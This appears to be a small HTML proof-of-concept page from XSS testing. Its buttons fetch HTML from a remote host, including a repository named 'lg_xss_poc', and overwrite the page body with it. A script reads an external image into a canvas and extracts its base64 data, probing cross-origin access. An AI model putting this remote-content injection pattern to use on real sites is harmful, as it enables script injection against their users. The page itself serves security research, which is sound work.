<html>
<head>

</head>
<body>

<input type='button' value='Refresh' id='y' onclick="$.get('http://breakpoint/test.html', function(data, status){document.body.outerHTML=data;})"  />
<input type='button' value='Refresh2' id='y' onclick="$.get('https://bitbucket.org/BugsecGit/lg_xss_poc/raw/master/mainscript.html', function(data, status){document.body.outerHTML=data;})"  />
<input type='button' value='test_jpg' onclick="Go();"/>
<form name='stas_test'>

</form>
<script>
        function getBase64Image(img) {
    alert();
   // Create an empty canvas element
   var canvas = document.createElement("canvas");
   canvas.width = img.width;
   canvas.height = img.height;

   // Copy the image contents to the canvas
   var ctx = canvas.getContext("2d");
   ctx.drawImage(img, 0, 0);

   // Get the data-URL formatted image
   // Firefox supports PNG and JPEG. You could check img.src to
   // guess the original format, but be aware the using "image/jpg"
   // will re-encode the image.
   var dataURL = canvas.toDataURL("image/png");

   return dataURL.replace(/^data:image\/(png|jpg);base64,/, "");
}


    
    function Go() {
    var Img=new Image (); 
    Img.src='http://d3sdoylwcs36el.cloudfront.net/ken-Thomson.jpg';
            alert(getBase64Image(Img));
        
    }
</script>

</body>
</html>